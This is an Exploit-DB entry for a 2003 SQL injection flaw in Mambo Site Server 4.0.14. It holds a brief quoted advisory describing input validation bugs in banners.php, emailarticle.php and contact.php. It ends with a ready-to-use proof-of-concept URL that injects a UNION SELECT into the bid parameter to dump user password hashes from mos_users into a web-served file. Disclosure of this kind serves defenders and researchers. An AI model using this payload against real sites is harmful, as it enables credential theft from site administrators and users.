Mambo Site Server 4.0.14 - 'banners.php?bid' SQL Injection

EDB-ID:

23158

CVE:

7484


Platform:

PHP

Published:

2003-09-18

source: http://www.securityfocus.com/bid/8647/info

It has been reported that Mambo Open Source Server is prone to multiple input validation vulnerabilities that may allow remote attackers to inject malicious SQL syntax into database queries and send anonymous e-mail to arbitrary users.

The vulnerabilities have been reported to exists in the banners.php, emailfriend/emailarticle.php, and contact.php modules of ths software.

Mambo Open Source Server 4.0.14 has been reported to be prone to this problem, however other versions may be affected as well.

http://www.example.com/mambo/banners.php?op=click&bid=100 UNION select password from mos_users where 1=1 into outfile 'c:/apache2/htdocs/mos.txt'